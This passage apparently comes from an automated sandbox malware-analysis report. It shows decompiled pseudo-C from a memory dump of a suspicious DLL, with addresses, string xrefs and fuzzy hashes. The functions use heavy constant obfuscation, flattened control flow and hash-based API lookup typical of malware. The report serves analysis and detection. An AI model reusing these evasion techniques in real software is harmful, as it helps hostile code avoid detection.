				_v1680 = _v1680 / _t325;
				_v1680 = _v1680 ^ 0x000c0a94;
				_v1656 = 0x7af90a;
				_v1656 = _v1656 >> 0x10;
				_v1656 = _v1656 ^ 0xd48e11dc;
				_v1656 = _v1656 ^ 0xd48f85db;
				_v1664 = 0xc7c49c;
				_v1664 = _v1664 ^ 0x0b3147da;
				_v1664 = _v1664 ^ 0x91b20725;
				_v1664 = _v1664 ^ 0x9a45c1a7;
				_v1584 = 0x3444f6;
				_v1584 = _v1584 << 2;
				_v1584 = _v1584 ^ 0x00d71217;
				_v1624 = 0x130de1;
				_t326 = 0x58;
				_v1624 = _v1624 / _t326;
				_v1624 = _v1624 ^ 0x000fc6c7;
				_v1588 = 0xc870d9;
				_v1588 = _v1588 >> 7;
				_v1588 = _v1588 ^ 0x00060dd4;
				_v1600 = 0xa62b50;
				_v1600 = _v1600 | 0x0b3ea590;
				_v1600 = _v1600 ^ 0x0bb32963;
				_v1640 = 0x5829fa;
				_v1640 = _v1640 >> 0x10;
				_v1640 = _v1640 * 7;
				_v1640 = _v1640 ^ 0x000c8c8e;
				_v1620 = 0x9954e5;
				_v1620 = _v1620 | 0x46050794;
				_v1620 = _v1620 ^ 0x46999c00;
				_v1672 = 0x8b6b4f;
				_v1672 = _v1672 ^ 0x051743d3;
				_v1672 = _v1672 + 0x5fbf;
				_v1672 = _v1672 * 0x44;
				_v1672 = _v1672 ^ 0x7d983568;
				_v1596 = 0x4b105f;
				_v1596 = _v1596 ^ 0x074c3e20;
				_v1596 = _v1596 ^ 0x0709a291;
				_v1632 = 0x867cf1;
				_v1632 = _v1632 + 0x5758;
				_v1632 = _v1632 << 0xb;
				_v1632 = _v1632 ^ 0x36a3bfa7;
				_v1604 = 0x1e01e;
				_t327 = 0x6d;
				_v1604 = _v1604 / _t327;
				_v1604 = _v1604 ^ 0x000451f9;
				_v1612 = 0x51328f;
				_t328 = 0x66;
				_t303 = _v1612 / _t328;
				_v1612 = _t303;
				_v1612 = _v1612 ^ 0x000ccfe8;
				while(_t370 != 0x219adc7) {
					if(_t370 == 0x472b880) {
						_push(_t328);
						__eflags = 0;
						return E02B485FF(_v1596, _v1632, 0, 0, 0,  &_v1560, _v1604, 0, _v1612);
					}
					_t379 = _t370 - 0x6430241;
					if(_t370 != 0x6430241) {
						L7:
						__eflags = _t370 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t303;
						}
						L10:
						return _t303;
					}
					E02B50DB1(_v1592,  &_v1040, _t379, _v1660, _t328, _v1628);
					 *((short*)(E02B409DD(_v1684,  &_v1040, _v1676, _v1616))) = 0;
					E02B3BAA9(_v1688, _v1692, _t379, _v1644, _v1668,  &_v520);
					_push(_v1580);
					_push(_v1608);
					_push(_v1652);
					E02B52D0A(_v1680, _t379,  &_v520, _v1656, _v1664, _v1584, 0x2b318bc,  &_v1560,  &_v1040, E02B4E1F8(0x2b318bc, _v1636, _t379));
					E02B4FECB(_t310, _v1624, _v1588, _v1600, _v1640);
					_t328 = _v1620;
					_t303 = E02B3BFBE( &_v1560, _t316, _v1672);
					_t373 =  &(_t373[0x18]);
					if(_t303 != 0) {
						_t370 = 0x472b880;
						continue;
					}
					goto L10;
				}
				_t370 = 0x6430241;
				goto L7;
			}

0x02b500ef
0x02b500f5
0x02b5010c
0x02b5010d
0x02b50111
0x02b50114
0x02b50115
0x02b5011a
0x02b5011b
0x02b5012b
0x02b5012f
0x02b50137
0x02b5013f
0x02b50147
0x02b5014c
0x02b50154
0x02b5015c
0x02b50164
0x02b5016c
0x02b50174
0x02b50181
0x02b50184
0x02b50188
0x02b5018d
0x02b50195
0x02b501a5
0x02b501ad
0x02b501b2
0x02b501b8
0x02b501c0
0x02b501c8
0x02b501d0
0x02b501d5
0x02b501dd
0x02b501e5
0x02b501f2
0x02b501f3
0x02b501fc
0x02b50200
0x02b50208
0x02b50210
0x02b5021e
0x02b50227
0x02b5022b
0x02b50233
0x02b5023b
0x02b50240
0x02b50248
0x02b50250
0x02b5025d
0x02b50261
0x02b50266
0x02b5026e
0x02b50276
0x02b50286
0x02b5028b
0x02b50291
0x02b50299
0x02b502a5
0x02b502aa
0x02b502b0
0x02b502b8
0x02b502c0
0x02b502c8
0x02b502cd
0x02b502d5
0x02b502e0
0x02b502eb
0x02b502f6
0x02b502fe
0x02b50303
0x02b50308
0x02b50310
0x02b5031c
0x02b50321
0x02b5032c
0x02b5032f
0x02b5033b
0x02b5033f
0x02b50347
0x02b5034f
0x02b50354
0x02b5035c
0x02b50364
0x02b5036c
0x02b50374
0x02b5037c
0x02b50384
0x02b5038f
0x02b50397
0x02b503a2
0x02b503ae
0x02b503b1
0x02b503b5
0x02b503bd
0x02b503c5
0x02b503ca
0x02b503d2
0x02b503da
0x02b503e2
0x02b503ea
0x02b503f2
0x02b503fc
0x02b50400
0x02b50408
0x02b50410
0x02b50418
0x02b50420
0x02b50428
0x02b50430
0x02b5043d
0x02b50441
0x02b50449
0x02b50451
0x02b5045b
0x02b50468
0x02b50475
0x02b5047d
0x02b50482
0x02b5048a
0x02b50498
0x02b5049d
0x02b504a3
0x02b504ab
0x02b504b7
0x02b504b8
0x02b504ba
0x02b504be
0x02b504c6
0x02b504d4
0x02b505e9
0x02b505ee
0x00000000
0x02b5060f
0x02b504da
0x02b504dc
0x02b505db
0x02b505db
0x02b505e1
0x00000000
0x00000000
0x00000000
0x00000000
0x02b5061c
0x02b5061c
0x02b5061c
0x02b504f9
0x02b50518
0x02b50533
0x02b50538
0x02b50544
0x02b5054b
0x02b5058e
0x02b505ae
0x02b505b7
0x02b505c6
0x02b505cb
0x02b505d0
0x02b505d2
0x00000000
0x02b505d2
0x00000000
0x02b505d0
0x02b505d9
0x00000000

Strings

XW, xrefs: 02B50475
+XJ, xrefs: 02B50250
_!1, xrefs: 02B5026E
$P, xrefs: 02B50101

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$+XJ$XW$_!1
API String ID: 0-3524045022
Opcode ID: 4f568c6862f06142ab831a3be87c02fc77410d300dae959fc363041c185c4f97
Instruction ID: 80dff316e7b78f516050b9c2eea49773372d408fc58646e8668d3dbb75810917
Opcode Fuzzy Hash: 4f568c6862f06142ab831a3be87c02fc77410d300dae959fc363041c185c4f97
Instruction Fuzzy Hash: FFD1F1715093809FD368CF25C98AA5BBBF2FBC4748F108E1DF5999A260D7B59908CF42

Uniqueness

Uniqueness Score: -1.00%

Function 02B380C0, Relevance: 5.3, Strings: 4, Instructions: 261
COMMONCrypto

Download Yara Rule

C-Code - Quality: 74%

			E02B380C0(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				unsigned int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				unsigned int _v168;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				unsigned int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				void* _t254;
				void* _t262;
				intOrPtr _t274;
				intOrPtr _t275;
				intOrPtr* _t276;
				void* _t301;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				intOrPtr _t314;
				void* _t315;
				intOrPtr _t318;
				signed int* _t319;

				_t276 = __ecx;
				_t319 =  &_v224;
				_v180 = 0xc71c90;
				_v180 = _v180 * 0x55;
				_t315 = 0xb85ea37;
				_v180 = _v180 + 0xffff2ba7;
				_v180 = _v180 ^ 0x4211e203;
				_v140 = 0x3ad325;
				_v140 = _v140 ^ 0x295262d9;
				_v140 = _v140 ^ 0x29635001;
				_v136 = 0xed3dcc;
				_t307 = 0x6e;
				_v172 = __ecx;
				_v136 = _v136 * 0x41;
				_v136 = _v136 ^ 0x3c3e3c90;
				_v168 = 0x802272;
				_v168 = _v168 + 0x3a4b;
				_v168 = _v168 >> 4;
				_v168 = _v168 ^ 0x0009cc0d;
				_v144 = 0x950525;
				_v144 = _v144 >> 0xb;
				_v144 = _v144 ^ 0x0000417f;
				_v132 = 0xde9c46;
				_v132 = _v132 | 0x6a28fd38;
				_v132 = _v132 ^ 0x6afd2d29;
				_v152 = 0x89fdc2;
				_v152 = _v152 + 0xffff27d1;
				_v152 = _v152 / _t307;
				_v152 = _v152 ^ 0x00002723;
				_v208 = 0xb8ba68;
				_t308 = 0x59;
				_v208 = _v208 / _t308;
				_v208 = _v208 | 0x82dd863f;
				_t309 = 0x24;
				_v208 = _v208 / _t309;
				_v208 = _v208 ^ 0x03ab2b52;
				_v200 = 0x881ce0;
				_t310 = 0x22;
				_v200 = _v200 / _t310;
				_v200 = _v200 >> 6;
				_v200 = _v200 + 0x7e14;
				_v200 = _v200 ^ 0x000ee7c7;
				_v216 = 0xe9a9fc;
				_v216 = _v216 >> 0xa;
				_v216 = _v216 * 0x7c;
				_v216 = _v216 >> 3;
				_v216 = _v216 ^ 0x000159fc;
				_v148 = 0xc6b5e0;
				_v148 = _v148 >> 8;
				_v148 = _v148 ^ 0x0008baff;
				_v192 = 0x70df9a;
				_v192 = _v192 | 0xc7ad4485;
				_v192 = _v192 << 0xe;
				_v192 = _v192 * 0x6c;
				_v192 = _v192 ^ 0x95ca127f;
				_v164 = 0x9f9928;
				_v164 = _v164 + 0x9182;
				_v164 = _v164 | 0x4431d27d;
				_v164 = _v164 ^ 0x44b31704;
				_v156 = 0x8a7155;
				_v156 = _v156 ^ 0x4b85dc4d;
				_v156 = _v156 << 3;
				_v156 = _v156 ^ 0x587c4d22;
				_v184 = 0xc4c18b;
				_v184 = _v184 ^ 0x011789e6;
				_v184 = _v184 | 0x4a7cbaeb;
				_v184 = _v184 ^ 0x4bf1fe8b;
				_v160 = 0x793715;
				_v160 = _v160 | 0xbf52a4ae;
				_v160 = _v160 ^ 0x0f7ea677;
				_v160 = _v160 ^ 0xb008de62;
				_v212 = 0x3fdf0f;
				_v212 = _v212 + 0xffffd1fd;
				_t311 = 7;
				_t318 = _v172;
				_v212 = _v212 * 0x1c;
				_v212 = _v212 >> 5;
				_v212 = _v212 ^ 0x0033b954;
				_v220 = 0x4e6c7b;
				_v220 = _v220 >> 4;
				_t275 = _v172;
				_v220 = _v220 / _t311;
				_v220 = _v220 + 0x72d0;
				_v220 = _v220 ^ 0x000bd6ae;
				_v176 = 0xb64387;
				_v176 = _v176 + 0xffff3763;
				_v176 = _v176 >> 0x10;
				_v176 = _v176 ^ 0x000cc814;
				_v224 = 0xc05028;
				_v224 = _v224 + 0xffff6137;
				_v224 = _v224 >> 1;
				_v224 = _v224 ^ 0x7bfc229c;
				_v224 = _v224 ^ 0x7ba9fc4e;
				_v188 = 0xb7ebf2;
				_v188 = _v188 >> 9;
				_v188 = _v188 ^ 0x513bd66b;
				_t312 = 0x35;
				_v188 = _v188 * 0x6b;
				_v188 = _v188 ^ 0xf3ed84ff;
				_v196 = 0x918e67;
				_v196 = _v196 >> 0xb;
				_v196 = _v196 / _t312;
				_t313 = 0x12;
				_t314 = _v172;
				_v196 = _v196 / _t313;
				_v196 = _v196 ^ 0x000cd5f1;
				_v204 = 0xbd465b;
				_v204 = _v204 ^ 0x40a0ad4b;
				_v204 = _v204 * 0x5a;
				_v204 = _v204 >> 6;
				_v204 = _v204 ^ 0x022df88e;
				while(1) {
					L1:
					_t254 = 0x58c5d57;
					do {
						while(_t315 != 0x26b32e) {
							if(_t315 == _t254) {
								_push(_v160);
								_push(_v184);
								_push(_v156);
								_t262 = E02B4E1F8(0x2b31738, _v164, __eflags);
								_push(_t314);
								_push( &_v128);
								_push(_t262);
								_push(_t318);
								_push(_t275);
								 *((intOrPtr*)(E02B531AA(0xb00b1257, 0x44)))();
								E02B4FECB(_t262, _v212, _v220, _v176, _v224);
								_t319 =  &(_t319[0xb]);
								_t315 = 0x5b11858;
								goto L12;
							} else {
								if(_t315 == 0x5b11858) {
									E02B52B09(_v188, _t314, _v196, _v204);
								} else {
									if(_t315 == 0xa9c05ca) {
										_t314 = E02B50A64( *((intOrPtr*)(_t276 + 4)),  *_t276, _v152, _v208);
										__eflags = _t314;
										if(__eflags != 0) {
											_t315 = 0xed0de4e;
											L12:
											_t276 = _v172;
											goto L1;
										}
									} else {
										if(_t315 == 0xb85ea37) {
											_t315 = 0x26b32e;
											continue;
										} else {
											if(_t315 != 0xed0de4e) {
												goto L15;
											} else {
												_t318 = 0x4000;
												_push(_t276);
												_push(_t276);
												_t274 = E02B3C5D8(0x4000);
												_t276 = _v172;
												_t275 = _t274;
												_t319 =  &(_t319[3]);
												_t254 = 0x58c5d57;
												_t315 =  !=  ? 0x58c5d57 : 0x5b11858;
												continue;
											}
										}
									}
								}
							}
							L18:
							return _t275;
						}
						_push(_t276);
						_push(_t276);
						_t318 = E02B4CCA0(1, 0x10);
						_push( &_v128);
						_push(_t318);
						_push(_v132);
						_t301 = 0xb;
						E02B3E404(_v144, _t301);
						_t276 = _v172;
						_t319 =  &(_t319[7]);
						_t315 = 0xa9c05ca;
						_t254 = 0x58c5d57;
						L15:
						__eflags = _t315 - 0x7f64d40;
					} while (__eflags != 0);
					goto L18;
				}
			}

0x02b380c0
0x02b380c0
0x02b380c6
0x02b380d9
0x02b380dd
0x02b380e2
0x02b380ea
0x02b380f2
0x02b380fa
0x02b38102
0x02b3810a
0x02b38119
0x02b3811c
0x02b38120
0x02b38124
0x02b3812c
0x02b38134
0x02b3813c
0x02b38141
0x02b38149
0x02b38151
0x02b38156
0x02b3815e
0x02b38166
0x02b3816e
0x02b38176
0x02b3817e
0x02b3818e
0x02b38192
0x02b3819a
0x02b381a6
0x02b381ab
0x02b381b1
0x02b381bd
0x02b381c2
0x02b381c8
0x02b381d0
0x02b381dc
0x02b381df
0x02b381e3
0x02b381e8
0x02b381f0
0x02b381f8
0x02b38200
0x02b3820a
0x02b3820e
0x02b38213
0x02b3821b
0x02b38223
0x02b38228
0x02b38230
0x02b38238
0x02b38240
0x02b3824a
0x02b3824e
0x02b38256
0x02b3825e
0x02b38266
0x02b3826e
0x02b38276
0x02b38280
0x02b38288
0x02b3828d
0x02b38295
0x02b3829d
0x02b382a5
0x02b382ad
0x02b382b5
0x02b382bd
0x02b382c5
0x02b382cd
0x02b382d5
0x02b382dd
0x02b382ec
0x02b382ef
0x02b382f3
0x02b382f7
0x02b382fc
0x02b38304
0x02b3830c
0x02b38319
0x02b3831d
0x02b38321
0x02b38329
0x02b38331
0x02b38339
0x02b38341
0x02b38346
0x02b3834e
0x02b38356
0x02b3835e
0x02b38362
0x02b3836a
0x02b38372
0x02b3837a
0x02b3837f
0x02b3838c
0x02b3838f
0x02b38393
0x02b3839b
0x02b383a3
0x02b383b0
0x02b383b8
0x02b383bb
0x02b383bf
0x02b383c3
0x02b383cb
0x02b383d3
0x02b383e0
0x02b383e4
0x02b383e9
0x02b383f1
0x02b383f1
0x02b383f1
0x02b383f6
0x02b383f6
0x02b38404
0x02b3849c
0x02b384a5
0x02b384a9
0x02b384b1
0x02b384c4
0x02b384c5
0x02b384c6
0x02b384c7
0x02b384c8
0x02b384d1
0x02b384e5
0x02b384ea
0x02b384ed
0x00000000
0x02b3840a
0x02b38410
0x02b3855a
0x02b38416
0x02b3841c
0x02b38482
0x02b38486
0x02b38488
0x02b3848e
0x02b38493
0x02b38493
0x00000000
0x02b38493
0x02b3841e
0x02b38424
0x02b38469
0x00000000
0x02b38426
0x02b3842c
0x00000000
0x02b38432
0x02b38436
0x02b38447
0x02b38448
0x02b3844a
0x02b3844f
0x02b38453
0x02b38455
0x02b3845f
0x02b38464
0x00000000
0x02b38464
0x02b3842c
0x02b38424
0x02b3841c
0x02b38410
0x02b38564
0x02b3856d
0x02b3856d
0x02b38504
0x02b38505
0x02b3850f
0x02b38518
0x02b38519
0x02b3851a
0x02b38527
0x02b38528
0x02b3852d
0x02b38531
0x02b38534
0x02b38539
0x02b3853e
0x02b3853e
0x02b3853e
0x00000000
0x02b3854a

Strings

#', xrefs: 02B38192
{lN, xrefs: 02B38304
"M|X, xrefs: 02B3828D
K:, xrefs: 02B38134

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: "M|X$#'$K:${lN
API String ID: 0-1886388755
Opcode ID: 315fd82cac29fe334f6bc84a8364a1dc6ede968eff5e6d7bdc6a6c3d62943615
Instruction ID: ea034dcf5ce72e0f1ccef6a5f7575342c02ae6efebb55c35b3bd4d98fb2361f4
Opcode Fuzzy Hash: 315fd82cac29fe334f6bc84a8364a1dc6ede968eff5e6d7bdc6a6c3d62943615
Instruction Fuzzy Hash: 14C13E725083809FC358CE2AC48A90BFBE1FBD4758F10896DFA9596260D7B5D949CF83

Uniqueness

Uniqueness Score: -1.00%

Function 02B34BFC, Relevance: 5.2, Strings: 4, Instructions: 245
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E02B34BFC(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				unsigned int _v108;
				unsigned int _v112;
				intOrPtr* _t246;
				signed int _t258;
				intOrPtr _t259;
				intOrPtr _t260;
				signed int _t262;
				intOrPtr _t266;
				intOrPtr _t267;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				intOrPtr _t297;
				void* _t299;
				signed int _t300;
				intOrPtr _t301;
				intOrPtr _t302;
				unsigned int* _t303;
				unsigned int* _t304;

				_t260 = __ecx;
				_t303 =  &_v112;
				_v8 = __edx;
				_v24 = __ecx;
				_v28 = 0xe57752;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 ^ 0x00000395;
				_v84 = 0xa7b43c;
				_v84 = _v84 << 0xc;
				_t299 = 0x791519f;
				_v20 = _v20 & 0x00000000;
				_t291 = 0x69;
				_v84 = _v84 / _t291;
				_v84 = _v84 ^ 0x0126ef50;
				_v64 = 0x5471f4;
				_v64 = _v64 << 0xf;
				_v64 = _v64 ^ 0x38ff966c;
				_v108 = 0xe1a857;
				_v108 = _v108 >> 7;
				_v108 = _v108 << 0xf;
				_v108 = _v108 >> 0xf;
				_v108 = _v108 ^ 0x000c4d53;
				_v112 = 0xe3e3b6;
				_t292 = 0x1c;
				_t258 = 0x3d;
				_v112 = _v112 * 0x7f;
				_v112 = _v112 ^ 0x4177f445;
				_v112 = _v112 >> 8;
				_v112 = _v112 ^ 0x003f3c7e;
				_v60 = 0xdb6601;
				_v60 = _v60 | 0x1a9202c7;
				_v60 = _v60 ^ 0x1ad2035c;
				_v104 = 0x132994;
				_v104 = _v104 / _t292;
				_v104 = _v104 + 0x3dcb;
				_v104 = _v104 | 0x8aefcc47;
				_v104 = _v104 ^ 0x8ae713b1;
				_v80 = 0x4c94ef;
				_v80 = _v80 / _t258;
				_v80 = _v80 + 0xffffb573;
				_v80 = _v80 ^ 0x000791ec;
				_v48 = 0x6ce617;
				_v48 = _v48 ^ 0x91a29be4;
				_v48 = _v48 ^ 0x91c139dc;
				_v52 = 0x59f0b3;
				_v52 = _v52 ^ 0x18747c17;
				_v52 = _v52 ^ 0x182d8be2;
				_v56 = 0x3df981;
				_v56 = _v56 << 8;
				_v56 = _v56 ^ 0x3dfc4daf;
				_v76 = 0x62b80;
				_t293 = 0x5d;
				_v76 = _v76 / _t293;
				_v76 = _v76 + 0xffffe926;
				_v76 = _v76 ^ 0xfff7137f;
				_v72 = 0x7226d;
				_v72 = _v72 >> 1;
				_v72 = _v72 + 0x788a;
				_v72 = _v72 ^ 0x000e590c;
				_v96 = 0x39de81;
				_v96 = _v96 + 0x1ccc;
				_v96 = _v96 ^ 0xfb454dc1;
				_v96 = _v96 ^ 0xf28cd76a;
				_v96 = _v96 ^ 0x09fed289;
				_v100 = 0xca2105;
				_v100 = _v100 | 0x676862be;
				_v100 = _v100 + 0xffff68c4;
				_v100 = _v100 << 6;
				_v100 = _v100 ^ 0xfa784873;
				_v40 = 0xc4a147;
				_v40 = _v40 ^ 0x45259758;
				_v40 = _v40 ^ 0x45e701de;
				_v44 = 0x2d23a0;
				_t294 = 0x11;
				_t302 = _v8;
				_v44 = _v44 * 0x52;
				_v44 = _v44 ^ 0x0e7a51ec;
				_v92 = 0x79a225;
				_v92 = _v92 / _t294;
				_v92 = _v92 >> 9;
				_v92 = _v92 | 0x8583c695;
				_v92 = _v92 ^ 0x858adeed;
				_v88 = 0xed07fb;
				_v88 = _v88 + 0x2638;
				_t295 = 0x61;
				_v88 = _v88 / _t295;
				_t296 = 0xa;
				_t297 = _v4;
				_v88 = _v88 / _t296;
				_v88 = _v88 ^ 0x000a4d02;
				_v32 = 0x581804;
				_v32 = _v32 << 2;
				_v32 = _v32 ^ 0x01684d46;
				_v68 = 0xe8e83;
				_v68 = _v68 | 0xc7c33aae;
				_t259 = _v8;
				_v68 = _v68 / _t258;
				_v68 = _v68 ^ 0x0347a863;
				_t240 = _v36;
				L1:
				while(1) {
					do {
						while(_t299 != 0x16cba6e) {
							if(_t299 == 0x286464d) {
								_t297 = 0x10000;
								_push(_t260);
								_push(_t260);
								_t240 = E02B3C5D8(0x10000);
								_t259 = _t240;
								_t303 =  &(_t303[3]);
								if(_t259 != 0) {
									_v36 = _t240;
									_t302 = 0x10000;
									L7:
									_t260 = _v24;
									_t299 = 0x16cba6e;
									continue;
								}
							} else {
								if(_t299 != 0x791519f) {
									goto L15;
								} else {
									_t299 = 0x286464d;
									continue;
								}
							}
							goto L16;
						}
						_t262 = E02B49C65(_v60,  &_v16, _t240, _t260, _t302, _v104, _v80);
						_t303 =  &(_t303[5]);
						_v20 = _t262;
						if(_t262 == 0) {
							L14:
							_t260 = _v24;
							_t299 = 0xcecd29d;
							goto L15;
						} else {
							_t266 = _v16;
							if(_t266 == 0) {
								goto L14;
							} else {
								_t240 = _v36 + _t266;
								_v36 = _v36 + _t266;
								_t302 = _t302 - _t266;
								if(_t302 != 0) {
									goto L7;
								} else {
									_t267 = _t297 + _t297;
									_push(_t267);
									_push(_t267);
									_v12 = _t267;
									_t301 = E02B3C5D8(_t267);
									_t304 =  &(_t303[3]);
									if(_t301 != 0) {
										E02B4C9B0(_v72, _t301, _v96, _t297, _t259, _v100);
										E02B52B09(_v40, _t259, _v44, _v92);
										_t302 = _t297;
										_t240 = _t301 + _t297;
										_t297 = _v12;
										_t303 =  &(_t304[6]);
										_v36 = _t240;
										_t259 = _t301;
										if(_t302 != 0) {
											goto L7;
										}
									}
								}
							}
						}
						break;
						L15:
						_t240 = _v36;
					} while (_t299 != 0xcecd29d);
					L16:
					_t300 = _v20;
					if(_t300 != 0) {
						_t246 = _v8;
						 *_t246 = _t259;
						 *((intOrPtr*)(_t246 + 4)) = _t297 - _t302;
					} else {
						E02B52B09(_v88, _t259, _v32, _v68);
					}
					return _t300;
				}
			}

0x02b34bfc
0x02b34bfc
0x02b34c03
0x02b34c07
0x02b34c0b
0x02b34c13
0x02b34c18
0x02b34c20
0x02b34c28
0x02b34c31
0x02b34c3a
0x02b34c3f
0x02b34c44
0x02b34c4a
0x02b34c52
0x02b34c5a
0x02b34c5f
0x02b34c67
0x02b34c6f
0x02b34c74
0x02b34c79
0x02b34c7e
0x02b34c86
0x02b34c93
0x02b34c96
0x02b34c99
0x02b34c9d
0x02b34ca5
0x02b34caa
0x02b34cb2
0x02b34cba
0x02b34cc2
0x02b34cca
0x02b34cda
0x02b34cde
0x02b34ce6
0x02b34cee
0x02b34cf6
0x02b34d06
0x02b34d0a
0x02b34d12
0x02b34d1a
0x02b34d22
0x02b34d2a
0x02b34d32
0x02b34d3a
0x02b34d42
0x02b34d4a
0x02b34d52
0x02b34d57
0x02b34d5f
0x02b34d6b
0x02b34d6e
0x02b34d72
0x02b34d7a
0x02b34d82
0x02b34d8a
0x02b34d8e
0x02b34d96
0x02b34d9e
0x02b34da6
0x02b34dae
0x02b34db6
0x02b34dc0
0x02b34dc8
0x02b34dd0
0x02b34dd8
0x02b34de0
0x02b34de5
0x02b34ded
0x02b34df5
0x02b34dfd
0x02b34e05
0x02b34e14
0x02b34e17
0x02b34e1b
0x02b34e1f
0x02b34e27
0x02b34e37
0x02b34e3b
0x02b34e40
0x02b34e48
0x02b34e50
0x02b34e58
0x02b34e64
0x02b34e69
0x02b34e73
0x02b34e78
0x02b34e7c
0x02b34e80
0x02b34e88
0x02b34e90
0x02b34e95
0x02b34e9d
0x02b34ea5
0x02b34eb3
0x02b34eb7
0x02b34ebb
0x02b34ec3
0x00000000
0x02b34ec7
0x02b34ec7
0x02b34ec7
0x02b34ed5
0x02b34eee
0x02b34eff
0x02b34f00
0x02b34f02
0x02b34f07
0x02b34f09
0x02b34f0e
0x02b34f14
0x02b34f18
0x02b34f1a
0x02b34f1a
0x02b34f1e
0x00000000
0x02b34f1e
0x02b34ed7
0x02b34edd
0x00000000
0x02b34ee3
0x02b34ee3
0x00000000
0x02b34ee3
0x02b34edd
0x00000000
0x02b34ed5
0x02b34f3d
0x02b34f3f
0x02b34f42
0x02b34f48
0x02b34fd5
0x02b34fd5
0x02b34fd9
0x00000000
0x02b34f4e
0x02b34f4e
0x02b34f54
0x00000000
0x02b34f56
0x02b34f5a
0x02b34f5c
0x02b34f60
0x02b34f62
0x00000000
0x02b34f64
0x02b34f68
0x02b34f77
0x02b34f78
0x02b34f7a
0x02b34f86
0x02b34f88
0x02b34f8d
0x02b34f9f
0x02b34fb2
0x02b34fb7
0x02b34fb9
0x02b34fbc
0x02b34fc3
0x02b34fc6
0x02b34fca
0x02b34fce
0x00000000
0x02b34fd0
0x02b34fce
0x02b34f8d
0x02b34f62
0x02b34f54
0x00000000
0x02b34fde
0x02b34fde
0x02b34fe2
0x02b34fee
0x02b34fee
0x02b34ff4
0x02b35011
0x02b35017
0x02b35019
0x02b34ff6
0x02b35004
0x02b3500e
0x02b35025
0x02b35025

Strings

~<?, xrefs: 02B34CAA
~<?, xrefs: 02B34C8E
Rw, xrefs: 02B34C0B
8&, xrefs: 02B34E58

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 8&$Rw$~<?$~<?
API String ID: 0-2119221410
Opcode ID: 8600c1e993c0d45627bb2cec288f3db7b3b12e0d783027c3838aca3f29b87caf
Instruction ID: f2af97cd3f43b713633db807a2cbad049354ffc71d1a49a137342d4c8a212eab
Opcode Fuzzy Hash: 8600c1e993c0d45627bb2cec288f3db7b3b12e0d783027c3838aca3f29b87caf
Instruction Fuzzy Hash: AAB12D716093419FC358CF2AC48991BFBE1FBC4758F54892EF9A996220C3B4C949CF82

Uniqueness

Uniqueness Score: -1.00%

Function 02B52D53, Relevance: 5.2, Strings: 4, Instructions: 221
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E02B52D53(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t237;
				intOrPtr _t238;
				intOrPtr _t239;
				void* _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				void* _t267;
				void* _t268;
				signed int* _t271;
				signed int* _t272;

				_t271 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0xb3680a;
				_v8 = 0x44a7b2;
				_v84 = 0x16e473;
				_v84 = _v84 | 0xff7fd6cb;
				_v84 = _v84 << 0xe;
				_v84 = _v84 ^ 0xfdb25567;
				_v88 = 0x1491df;
				_v88 = _v88 | 0x25bec09f;
				_v88 = _v88 + 0xf90e;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xcae39943;
				_v92 = 0xaddb4a;
				_v92 = _v92 ^ 0x38a1add8;
				_t267 = __edx;
				_t243 = __ecx;
				_t245 = 0x27;
				_t268 = 0x72ed85;
				_v92 = _v92 / _t245;
				_t246 = 0x26;
				_v92 = _v92 * 0x56;
